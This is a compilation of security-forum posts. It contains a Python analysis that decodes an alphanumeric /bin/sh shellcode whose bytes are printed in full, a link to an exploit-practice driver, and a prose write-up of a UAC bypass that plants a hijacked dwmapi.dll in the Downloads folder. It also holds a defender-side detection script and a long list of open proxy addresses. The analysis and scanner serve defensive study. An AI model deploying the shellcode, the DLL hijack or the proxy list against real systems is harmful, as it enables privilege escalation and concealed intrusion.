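When a sample like this turns up in an incident, the analyst's job is to confirm what the self-modifying stub actually decodes to without running it. The Python below is an added analysis example (not part of the exploit-db entry or this post): it takes the 87 listed bytes, replays the three XOR instructions at the offsets the listing gives (0x4b, 0x53 and 0x4f relative to %rsi, which the stub sets to its own first byte), and checks the arithmetic the stub uses to build 0x05, 0xff, 0xf8 and the execve syscall number from alphanumeric immediates. The only assumption is that %rsi does point at byte 0 of the stub, as the comments in the listing state.

```python
import struct
from typing import Dict, Tuple

# The 87 assembled bytes exactly as listed in the post, and the XOR key the
# stub loads with push $0x5658356a ('hj5XV').
SHELLCODE = b"XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V"
KEY = 0x5658356A

# Offsets relative to %rsi (assumed to be the stub's own first byte), from the listing.
ENCODED_CODE_OFF = 0x4B   # xor %eax, 0x4b(%rsi)
ENCODED_DATA_OFF = 0x4F   # xor 0x4f(%rsi), %rax
ENCODED_TAIL_OFF = 0x53   # xor %eax, 0x53(%rsi)


def is_alphanumeric(code: bytes) -> bool:
    # The property the shellcode advertises: every byte is [0-9A-Za-z].
    return all(b < 0x80 and chr(b).isalnum() for b in code)


def register_constants() -> Dict[str, int]:
    # How the stub manufactures non-alphanumeric values from alnum immediates.
    al = 0x30 ^ 0x35                     # push $0x30 ; pop %rax ; xor $0x35,%al
    esi = (al * 0x33) & 0xFFFFFFFF       # imul $0x33,(%rcx),%esi
    f8 = esi ^ 0x30 ^ 0x37               # xor $0x30,%al ; xor $0x37,%al (on 0xff)
    syscall_nr = 0x00 ^ 0x75 ^ 0x4E      # xor $0x75,%al ; xor $0x4e,%al (on zeroed %rax)
    return {"al": al, "esi": esi, "f8": f8, "syscall_nr": syscall_nr}


def decode_stub(code: bytes = SHELLCODE, key: int = KEY) -> Tuple[bytes, bytes]:
    """Replay the three XOR instructions the stub runs against its own bytes.

    Returns (decoded code bytes at 0x4b, the 8-byte string left in %rax)."""
    buf = bytearray(code)
    key_le = struct.pack("<I", key)       # %eax as it lands in memory
    for i in range(4):                    # xor %eax, 0x4b(%rsi): instruction bytes
        buf[ENCODED_CODE_OFF + i] ^= key_le[i]
    for i in range(4):                    # xor %eax, 0x53(%rsi): "/sh\0"
        buf[ENCODED_TAIL_OFF + i] ^= key_le[i]
    # xor 0x4f(%rsi), %rax reads the 8 bytes and leaves the result in %rax only.
    qword = struct.unpack("<Q", bytes(buf[ENCODED_DATA_OFF:ENCODED_DATA_OFF + 8]))[0]
    rax = key ^ qword
    return bytes(buf[ENCODED_CODE_OFF:ENCODED_CODE_OFF + 4]), struct.pack("<Q", rax)


if __name__ == "__main__":
    code, path = decode_stub()
    print(len(SHELLCODE), is_alphanumeric(SHELLCODE))   # 87 True
    print(code.hex(), path)                              # 5e5f0f05 b'/bin/sh\x00'
    print(register_constants())                          # al 5, esi 255, f8 248, syscall_nr 59
```

The decoded four bytes are the pop %rsi / pop %rdi / syscall sequence the listing annotates, and the value left in %rax is the NUL-terminated path that the stub then pushes; the detection consequence is that a static alphanumeric-only signature on the 87 bytes is more robust than any signature on the decoded bytes, which never exist on disk.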
-
[h=1]KdExploitMe[/h]
A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
Source: https://github.com/clymb3r/KdExploitMe
-
[h=3]Passive UAC Elevation[/h]

I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll.

[h=2]LoadLibrary[/h]

This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file, the system will first check the KnownDlls registry key for the path; if it's not found there, the system will then look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64. If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; however, the dll must meet the following criteria:

[LIST]
[*]The application must load the dll by its name and not the full path (this is common).
[*]The dll must not exist in HKLM\SYSTEM\Control\Session Manager\KnownDLLs.
[*]The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa).
[*]The dll should exist in system32 or syswow64; special paths don't appear to work.
[/LIST]

ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher, "Adobe Systems Incorporated", and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll).

[Image caption: Is it a real flash update? Is it just ZeroAccess? Nobody knows.]

[h=2]A Less Invasive Method[/h]

What if there was a folder where 90% of the applications that require UAC elevation reside, and what if it was writable from a non-elevated process? Well, it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherlode: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it to the downloads folder, and run a setup file. Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll; however, this is a fairly easy fix: dll infection.

[h=2]Writing a DLL Infector[/h]

My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disables and overwrites the bound imports directory with the new section header, appends the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section. All we need now is some code for the section.

[h=2]The Shellcode[/h]

The obvious choice was to make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros; I'll quickly run over how it works.

[LIST=1]
[*]Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH.
[*]Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll.
[*]Uses a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA.
[*]Opens the current process token and queries it to confirm the application we are running from is UAC elevated.
[*]Gets the path of cmd.exe then executes it (UAC elevated of course).
[*]Passes execution back to the real dwmapi.dll entry point so execution can continue.
[/LIST]

[h=2]Putting It All Together[/h]

The final product infects dwmapi.dll with our shellcode and places it in the download folder; once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned (because of Wow64FsRedirect and the fact that most setups run under wow64, we can use the same code on 32-bit and 64-bit Windows). I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator

Posted by TM at 11:03 AM
Source: MalwareTech: Passive UAC Elevation
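As an added defender-side example (not MalwareTech's code and not part of the original post), the check below applies the hijack criteria listed in the post to a Downloads folder: a DLL there that shares its name with a System32/SysWOW64 DLL, is not protected by KnownDLLs and parses as a PE image is reported together with any setup executables sitting beside it. The file and registry collectors run only on Windows; the scenario in `demo()` is constructed and the `fake_pe_header` helper builds minimal headers that are not loadable images.

```python
# Added example: a defender-side scan for the Downloads-folder DLL hijack the
# post describes. Decision logic is pure Python (testable offline); the
# collectors that read the file system and registry run only on Windows.
import os
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
# Full registry path of the KnownDLLs list (the post abbreviates it).
KNOWN_DLLS_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"


def pe_machine(data):
    """IMAGE_FILE_HEADER.Machine of a PE buffer, or None if the buffer has no
    valid MZ/PE header (the first few KiB of the file are enough)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]


def hijack_candidates(downloads, system_dlls, known_dlls):
    """Apply the post's criteria to a download folder.
    downloads: {lower-case file name: leading bytes}; system_dlls / known_dlls:
    lower-case names in System32+SysWOW64 and under KnownDLLs.
    Returns [(dll name, "x86" or "x64", [.exe files in the same folder])]."""
    installers = sorted(n for n in downloads if n.endswith(".exe"))
    findings = []
    for name in sorted(downloads):
        if not name.endswith(".dll") or name not in system_dlls:
            continue                      # does not shadow a system DLL name
        if name in known_dlls:
            continue                      # KnownDLLs win over the app directory
        machine = pe_machine(downloads[name])
        if machine == IMAGE_FILE_MACHINE_AMD64:
            arch = "x64"
        elif machine == IMAGE_FILE_MACHINE_I386:
            arch = "x86"
        else:
            continue                      # not a loadable PE image at all
        findings.append((name, arch, installers))
    return findings


def fake_pe_header(machine):
    """Constructed minimal MZ+PE header (not a loadable image) for tests."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> offset 0x40
    return bytes(dos) + b"PE\0\0" + struct.pack("<H", machine) + bytes(18)


def demo():
    """Constructed scenario mirroring the post: a setup .exe next to a planted
    dwmapi.dll; kernel32.dll is skipped as a KnownDLL, vendor_helper.dll
    because it shadows no system DLL name."""
    downloads = {
        "flash_setup.exe": fake_pe_header(IMAGE_FILE_MACHINE_I386),
        "dwmapi.dll": fake_pe_header(IMAGE_FILE_MACHINE_I386),
        "kernel32.dll": fake_pe_header(IMAGE_FILE_MACHINE_I386),
        "vendor_helper.dll": fake_pe_header(IMAGE_FILE_MACHINE_AMD64),
    }
    system_dlls = {"dwmapi.dll", "kernel32.dll", "user32.dll"}
    known_dlls = {"kernel32.dll", "user32.dll"}
    return hijack_candidates(downloads, system_dlls, known_dlls)


def scan_downloads_windows():
    """Collect the real inputs and run the check (Windows only)."""
    import winreg                                     # Windows-only module
    windir = os.environ.get("SystemRoot", r"C:\Windows")
    system_dirs = [os.path.join(windir, d) for d in ("System32", "SysWOW64")]
    system_dlls = {f.lower() for d in system_dirs if os.path.isdir(d)
                   for f in os.listdir(d) if f.lower().endswith(".dll")}
    known_dlls = set()
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KNOWN_DLLS_KEY) as key:
        index = 0
        while True:
            try:
                _, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break                                 # end of the value list
            index += 1
            if isinstance(value, str) and value.lower().endswith(".dll"):
                known_dlls.add(value.lower())
    downloads_dir = os.path.join(os.path.expanduser("~"), "Downloads")
    downloads = {}
    for f in os.listdir(downloads_dir):
        path = os.path.join(downloads_dir, f)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                downloads[f.lower()] = fh.read(4096)  # headers are enough
    return hijack_candidates(downloads, system_dlls, known_dlls)


if __name__ == "__main__":
    results = scan_downloads_windows() if os.name == "nt" else demo()
    for dll, arch, exes in results:
        print(f"{dll} ({arch}) shadows a system DLL; setup files alongside: {exes}")
```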
-
[h=1]08-11-14 | VIP Socks 5 (62)[/h]
Checked & filtered Socks5:
Source: 08-11-14 | VIP Socks 5 (62) - Pastebin.com
-
08-11-14 | Fast Proxy Server List (1655) [LIST=1]08-11-14 | Fast Proxy Server List (1655) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.160.80.14:8088 1.161.212.57:80 1.161.212.57:8080 1.164.212.237:8088 1.164.227.161:8088 1.168.89.87:8088 1.171.1.145:9064 1.172.2.142:9064 1.179.147.2:8080 1.192.116.28:8585 101.251.238.123:8080 101.69.168.210:9000 101.69.168.211:9000 101.79.246.16:8080 101.79.246.6:8080 103.16.114.11:3128 103.21.184.209:9064 103.246.244.161:44338 103.249.181.5:3128 103.25.155.51:8080 103.25.203.227:7808 103.25.203.227:8089 103.25.7.51:9064 103.254.126.38:80 103.254.126.38:8080 103.255.121.195:80 103.28.158.41:9064 103.28.255.90:9064 103.31.133.226:3128 103.4.167.186:80 106.3.40.249:8081 106.37.177.251:3128 107.150.224.29:80 107.150.224.29:8080 107.170.206.99:80 108.165.33.11:3128 108.165.33.3:3128 108.165.33.4:3128 108.165.33.7:3128 108.165.33.9:3128 108.47.12.2:8081 109.120.150.87:3128 109.228.25.136:80 109.251.10.3:8080 109.73.170.248:80 110.153.9.250:80 110.252.17.176:8585 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.54.224.226:8080 110.77.197.156:3128 110.77.212.109:8080 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:8085 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8080 111.1.32.24:8088 111.1.32.24:81 111.1.32.24:8123 111.1.32.24:9064 111.1.32.24:9999 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.163:81 111.1.36.164:80 111.1.36.164:83 111.1.36.164:84 111.1.36.164:85 111.1.36.164:86 111.1.36.165:80 111.1.36.165:81 111.1.36.165:83 111.1.36.2:80 111.1.36.21:80 111.1.36.21:81 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.21:86 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:82 111.1.36.23:83 111.1.36.23:85 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 
111.1.36.25:82 111.1.36.25:83 111.1.36.25:84 111.1.36.25:85 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:82 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.10.10.25:8123 111.10.100.152:8123 111.10.100.206:8123 111.10.100.229:8123 111.10.103.231:8123 111.10.103.8:8123 111.10.108.200:8123 111.10.108.89:8123 111.10.112.131:8123 111.10.113.41:8123 111.10.113.81:8123 111.10.114.109:8123 111.10.115.68:8123 111.10.116.124:8123 111.10.116.183:8123 111.10.116.254:8123 111.10.117.84:8123 111.10.118.13:8123 111.10.118.159:8123 111.10.118.97:8123 111.10.128.199:8123 111.10.129.83:8123 111.10.130.176:8123 111.10.136.193:8123 111.10.137.169:8123 111.10.138.190:8123 111.10.139.154:8123 111.10.139.3:8123 111.10.14.153:8123 111.10.144.188:8123 111.10.145.59:8123 111.10.147.224:8123 111.10.15.14:8123 111.10.153.171:8123 111.10.155.159:8123 111.10.156.35:8123 111.10.160.198:8123 111.10.160.72:8123 111.10.163.89:8123 111.10.165.125:8123 111.10.165.155:8123 111.10.166.130:8123 111.10.166.209:8123 111.10.167.246:8123 111.10.167.48:8123 111.10.167.90:8123 111.10.177.223:8123 111.10.178.246:8123 111.10.182.230:8123 111.10.189.17:8123 111.10.198.100:8123 111.10.83.93:8123 111.11.184.10:80 111.11.184.103:80 111.11.184.116:80 111.11.184.12:80 111.11.184.13:80 111.11.184.14:80 111.11.184.20:80 111.11.184.36:80 111.11.184.37:80 111.11.184.43:80 111.11.184.44:80 111.11.184.7:80 111.11.184.79:80 111.11.184.81:80 111.11.184.82:80 111.11.184.83:80 111.11.184.84:80 111.11.184.85:80 111.11.184.9:80 111.11.228.81:80 111.12.128.167:80 111.12.128.171:80 111.12.128.172:80 111.13.109.51:80 111.13.109.52:80 111.13.109.53:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.161.126.98:80 111.161.126.99:80 111.199.154.85:3128 111.206.81.248:80 111.221.1.254:8080 111.240.197.179:8088 111.240.97.94:9064 111.249.157.35:3128 
111.249.95.80:9064 111.250.189.156:9064 111.250.233.6:3128 111.251.232.188:8088 111.252.249.231:8088 111.252.32.180:8088 111.254.142.200:8088 111.254.181.19:8088 111.254.45.161:9064 111.254.59.13:8088 111.3.82.148:8123 111.68.121.141:8080 111.7.129.140:80 111.7.129.140:8088 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8088 111.7.129.151:80 111.7.129.151:8086 111.7.129.151:8088 111.7.129.160:80 111.7.129.162:80 111.8.20.136:80 111.8.20.141:80 111.9.124.150:8123 111.9.232.47:8123 111.9.233.113:8123 111.9.234.167:8123 111.9.234.193:8123 111.9.86.91:8123 111.93.234.98:3128 112.0.156.206:8123 112.1.184.23:8123 112.104.113.161:8088 112.105.215.77:8088 112.15.18.195:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.165.199:8123 112.18.166.52:8123 112.18.171.122:8123 112.18.173.110:8123 112.18.174.31:8123 112.18.174.44:8123 112.18.176.104:8123 112.18.179.49:8123 112.18.196.121:8123 112.18.197.25:8123 112.18.21.195:8123 112.18.28.19:8123 112.18.52.252:8123 112.18.64.138:8123 112.18.72.137:8123 112.18.75.133:8123 112.18.88.48:8123 112.20.105.244:8123 112.20.122.50:8123 112.20.124.199:8123 112.20.148.163:8123 112.21.232.53:8123 112.22.126.72:8123 112.22.225.5:8123 112.22.228.9:8123 112.236.157.53:8585 112.24.124.157:8123 112.248.244.7:8585 112.25.43.3:3128 112.25.43.3:80 112.3.202.185:8123 112.44.229.135:8123 112.44.233.136:8123 112.44.247.170:8123 112.44.247.4:8123 112.5.16.50:80 112.65.18.17:8080 112.65.19.122:8080 112.65.212.74:3128 112.65.44.67:3128 112.91.208.78:9999 113.105.224.79:80 113.105.224.85:80 113.105.93.79:80 113.105.93.80:80 113.107.57.76:80 113.15.164.62:9999 113.162.133.235:80 113.19.87.107:8080 113.197.80.253:8080 113.200.220.151:8123 113.200.68.26:9000 113.201.63.12:80 113.214.13.1:8000 113.4.10.26:8118 113.53.249.131:8080 113.57.230.49:81 114.112.192.195:3128 114.231.23.140:8585 114.24.116.237:8088 114.24.172.68:8088 
114.24.19.129:8088 114.24.4.19:8088 114.241.192.8:8585 114.247.120.114:3128 114.255.183.163:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.241.175:9064 114.27.126.120:8088 114.27.126.49:8088 114.27.18.90:8088 114.27.5.18:9064 114.27.79.210:8088 114.36.6.48:9064 114.37.20.206:9064 114.37.26.213:8088 114.37.44.121:8088 114.38.196.145:8088 114.38.230.187:8088 114.38.36.200:8088 114.38.89.72:8088 114.39.187.196:8088 114.39.250.91:8088 114.40.110.122:9064 114.40.111.61:8088 114.40.205.50:9064 114.43.45.139:8088 114.44.0.98:8088 114.46.137.195:9064 114.66.229.2:80 114.79.135.42:9064 115.124.74.178:8080 115.236.59.194:3128 115.239.248.235:8080 116.228.55.217:8003 117.135.250.62:80 117.135.252.2:80 117.136.165.129:8123 117.139.28.168:8123 117.139.28.217:8123 117.139.39.75:8123 117.139.44.192:8123 117.139.47.69:8123 117.139.63.57:8123 117.139.65.237:8123 117.146.116.67:80 117.146.116.68:80 117.146.116.69:80 117.147.192.81:8123 117.147.195.68:8123 117.147.224.35:8123 117.147.246.181:8123 117.149.199.30:8123 117.149.218.110:8123 117.149.224.26:8123 117.149.234.93:8123 117.158.1.210:9999 117.162.124.188:8123 117.162.164.138:8123 117.162.168.201:8123 117.162.171.179:8123 117.162.173.237:8123 117.162.174.251:8123 117.162.193.126:8123 117.162.195.173:8123 117.162.201.77:8123 117.162.204.120:8123 117.162.216.173:8123 117.162.233.65:8123 117.162.238.139:8123 117.162.247.203:8123 117.162.70.148:8123 117.162.74.225:8123 117.162.80.48:8123 117.162.83.114:8123 117.162.84.146:8123 117.162.95.159:8123 117.163.109.69:8123 117.163.115.144:8123 117.163.119.129:8123 117.163.197.64:8123 117.163.202.212:8123 117.163.214.238:8123 117.163.216.119:8123 117.164.13.77:8123 117.164.151.112:8123 117.164.156.165:8123 117.164.157.188:8123 117.164.157.60:8123 117.164.158.249:8123 117.164.173.89:8123 117.164.205.150:8123 117.164.222.244:8123 117.164.28.112:8123 117.164.39.190:8123 117.164.58.11:8123 117.166.23.119:8123 117.166.237.137:8123 117.166.243.176:8123 117.166.41.70:8123 
117.166.46.233:8123 117.166.74.162:8123 117.166.95.188:8123 117.166.96.26:8123 117.167.100.247:8123 117.169.207.95:8123 117.170.220.6:8123 117.170.222.231:8123 117.170.226.23:8123 117.170.230.73:8123 117.170.231.15:8123 117.170.231.18:8123 117.170.231.204:8123 117.170.242.116:8123 117.170.242.40:8123 117.170.4.99:8123 117.170.5.153:8123 117.170.5.177:8123 117.170.59.122:8123 117.170.7.95:8123 117.171.103.30:8123 117.171.124.96:8123 117.171.137.177:8123 117.171.162.167:8123 117.171.228.250:8123 117.171.231.2:8123 117.171.235.178:8123 117.171.235.205:8123 117.171.238.250:8123 117.171.26.6:8123 117.171.55.210:8123 117.171.64.214:8123 117.171.67.245:8123 117.173.20.220:8123 117.173.20.247:8123 117.173.20.32:8123 117.173.20.55:8123 117.173.245.229:8123 117.173.249.166:8123 117.173.254.165:8123 117.173.61.251:8123 117.174.1.198:8123 117.174.173.94:8123 117.174.195.207:8123 117.174.198.147:8123 117.174.200.136:8123 117.174.201.108:8123 117.174.209.27:8123 117.174.211.77:8123 117.174.223.247:8123 117.174.227.101:8123 117.174.228.204:8123 117.175.196.170:8123 117.175.212.88:8123 117.175.228.199:8123 117.175.229.134:8123 117.175.229.179:8123 117.175.229.75:8123 117.175.230.180:8123 117.175.241.196:8123 117.175.32.47:8123 117.176.185.24:8123 117.21.192.7:80 117.58.241.15:8080 117.59.217.240:80 117.59.217.240:81 117.59.217.240:82 117.59.217.240:83 118.95.177.186:9064 118.97.172.58:80 118.97.191.206:8080 118.97.66.4:8080 118.97.95.182:8080 118.99.85.7:8080 119.110.71.126:8080 119.254.76.225:808 119.4.115.51:8090 119.4.95.135:80 119.4.95.136:80 119.40.97.2:8080 119.48.23.15:9999 119.6.136.126:80 119.6.136.126:81 119.97.146.152:80 12.167.84.237:8080 120.194.107.149:9999 120.198.243.111:80 120.198.243.113:80 120.198.243.114:80 120.198.243.115:8080 120.198.243.115:8888 120.198.243.116:80 120.198.243.130:80 120.198.243.131:80 120.198.243.14:80 120.198.243.15:80 120.198.243.151:80 120.198.243.48:80 120.198.243.50:80 120.198.243.52:80 120.198.243.78:80 120.198.243.78:81 
120.198.243.79:80 120.198.243.82:80 120.198.243.86:80 120.202.249.230:80 120.203.124.188:8123 120.203.151.29:8123 120.203.154.49:8123 120.203.158.99:8123 120.203.166.88:8123 120.203.173.68:8123 120.203.175.136:8123 120.203.214.144:80 120.203.214.144:81 120.203.214.144:82 120.203.214.144:83 120.203.214.144:84 120.203.214.147:80 120.203.214.147:81 120.203.214.147:82 120.203.214.147:83 120.203.214.147:84 120.203.214.151:80 120.203.214.183:80 120.203.214.187:80 120.203.214.187:9090 120.203.215.11:80 120.203.215.11:81 120.203.215.19:80 120.203.231.212:8123 120.203.232.192:8123 120.203.233.58:8123 120.206.109.21:8123 120.206.111.16:8123 120.206.112.25:8123 120.206.132.22:8123 120.206.132.41:8123 120.206.134.111:8123 120.206.139.70:8123 120.206.140.18:8123 120.206.140.49:8123 120.206.143.237:8123 120.206.143.30:8123 120.206.145.72:8123 120.206.147.125:8123 120.206.176.243:8123 120.206.194.66:8123 120.206.79.218:8123 122.156.137.188:8585 122.227.199.178:9999 122.254.25.136:9064 122.96.59.103:83 122.96.59.103:843 122.96.59.105:80 122.96.59.105:81 122.96.59.105:82 122.96.59.106:82 123.119.164.102:9000 123.150.207.105:80 123.177.20.220:80 123.195.188.190:9064 124.123.244.15:9064 124.123.42.135:9064 124.206.241.221:3128 124.240.187.79:82 124.240.187.79:83 124.240.187.80:80 124.240.187.81:83 124.6.135.170:3128 124.82.27.236:8080 124.88.67.19:80 125.164.125.239:3128 125.209.116.29:8080 125.212.193.2:3128 125.212.216.85:80 125.24.77.62:80 125.24.77.91:8080 125.24.78.154:80 125.24.78.223:8080 125.24.78.98:80 125.24.78.98:8080 125.24.79.234:80 125.24.79.235:8080 125.33.113.49:3128 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.75:80 125.39.66.75:8080 125.39.66.76:80 125.39.66.76:8080 125.42.176.208:9999 125.88.162.20:9999 125.88.255.143:80 125.88.255.144:80 125.89.74.233:3128 125.89.74.239:3128 125.89.74.240:3128 128.199.224.118:8080 130.0.25.162:8080 130.14.29.110:80 130.14.29.111:80 130.14.29.120:80 130.185.81.141:3128 131.155.186.8:3128 131.72.105.1:8080 
133.18.6.22:80 139.193.62.12:8080 14.114.244.161:9999 14.136.79.252:9064 14.167.9.111:80 14.18.16.71:80 14.18.237.150:8085 140.109.57.11:9590 140.112.214.1:9064 140.113.156.111:9064 140.113.241.221:9064 140.116.88.78:8888 140.119.137.22:9064 140.121.197.169:8080 140.123.122.211:9064 140.129.1.183:3128 140.134.140.57:9064 140.206.86.70:8080 141.85.204.71:1920 146.148.66.106:80 146.185.149.184:3128 149.255.255.242:80 149.255.255.250:80 152.26.69.36:8080 152.26.69.37:8080 154.65.4.90:8080 158.58.172.207:13374 158.58.172.207:14826 158.58.172.207:15692 158.58.172.207:19279 158.58.172.207:33919 158.58.172.207:33948 158.58.172.207:33965 158.58.172.207:34015 158.58.172.207:80 159.255.167.147:8080 162.208.49.45:7808 162.208.49.45:8089 162.243.205.210:3128 163.125.206.206:9999 163.177.79.4:80 163.177.79.5:80 163.28.10.162:8888 163.53.187.98:8080 168.63.255.195:8080 171.12.3.71:81 173.201.185.40:80 175.101.16.72:80 175.101.16.72:8080 175.138.194.103:8080 175.184.250.18:8080 175.99.126.38:80 176.241.83.173:8080 176.73.252.139:3128 176.99.6.237:3128 177.104.25.130:3128 177.124.62.106:3128 177.130.92.69:3128 177.17.167.18:8080 177.200.82.234:8080 177.207.112.140:8080 177.22.111.120:8080 177.223.0.213:8080 177.54.192.163:8080 177.64.93.97:3128 177.67.100.82:8080 177.75.42.33:8080 177.80.18.115:3128 177.99.164.171:8080 177.99.74.182:8080 178.124.157.187:8080 178.137.138.96:8080 178.18.25.151:8888 178.219.248.15:8080 178.254.153.158:8080 178.32.72.26:8089 178.74.68.74:8080 178.77.243.110:443 179.154.253.192:3128 180.109.8.115:8585 180.174.62.185:80 180.176.102.224:9064 180.177.222.51:8088 180.183.25.223:3128 180.183.250.69:8080 180.183.51.139:3128 180.218.44.226:9064 180.242.40.184:8080 180.250.172.182:8080 180.250.215.251:8080 180.250.43.88:8080 180.250.44.250:80 181.208.104.156:9064 181.225.58.104:9064 181.49.15.162:3128 181.72.4.115:9064 181.73.26.240:9064 182.118.23.7:8081 182.18.161.71:3128 182.235.110.89:8088 182.235.133.197:8088 182.235.169.169:9064 182.235.222.142:9064 
182.239.127.137:80 182.239.127.140:80 182.239.95.134:80 182.239.95.136:80 182.239.95.137:80 182.239.95.139:80 182.254.178.190:3128 182.254.212.164:80 182.254.221.192:8080 182.30.3.169:8080 182.36.82.12:8585 182.48.116.51:8080 182.52.49.157:80 182.70.37.75:3128 183.203.12.166:80 183.203.22.68:80 183.203.22.81:80 183.203.22.87:80 183.203.22.90:80 183.203.22.91:80 183.203.22.96:80 183.203.22.97:80 183.203.23.18:80 183.203.8.147:8080 183.203.8.148:8080 183.206.87.177:8123 183.207.224.13:80 183.207.224.14:80 183.207.224.42:80 183.207.224.43:80 183.207.224.44:80 183.207.224.45:80 183.207.224.47:80 183.207.224.48:80 183.207.224.49:80 183.207.224.49:81 183.207.224.50:81 183.207.224.50:85 183.207.224.51:83 183.207.224.51:84 183.207.224.52:80 183.207.224.52:81 183.207.229.12:80 183.207.229.12:8000 183.207.229.13:80 183.207.229.13:9000 183.207.229.139:80 183.207.229.194:80 183.207.229.195:80 183.207.229.199:80 183.207.229.202:80 183.207.229.203:80 183.207.237.11:80 183.207.237.18:80 183.207.237.18:81 183.207.237.21:80 183.208.196.120:8123 183.208.197.72:8123 183.208.200.131:8123 183.208.201.107:8123 183.208.213.193:8123 183.208.214.53:8123 183.208.222.149:8123 183.208.222.53:8123 183.208.35.12:8123 183.209.102.9:8123 183.209.107.226:8123 183.209.7.236:8123 183.211.110.131:8123 183.211.116.163:8123 183.211.5.29:8123 183.211.70.92:8123 183.211.72.156:8123 183.212.85.65:8123 183.212.95.68:8123 183.216.174.60:8123 183.216.176.124:8123 183.216.182.103:8123 183.216.189.171:8123 183.216.31.212:8123 183.216.57.48:8123 183.216.62.5:8123 183.217.140.33:8123 183.217.142.171:8123 183.217.189.61:8123 183.217.202.204:8123 183.217.204.233:8123 183.217.206.200:8123 183.217.232.56:8123 183.217.243.156:8123 183.218.103.32:8123 183.218.108.243:8123 183.218.122.95:8123 183.218.67.18:8123 183.218.85.93:8123 183.219.136.247:8123 183.219.137.144:8123 183.219.138.212:8123 183.219.140.46:8123 183.219.149.178:8123 183.219.153.83:8123 183.219.160.162:8123 183.219.2.65:8123 183.219.247.96:8123 
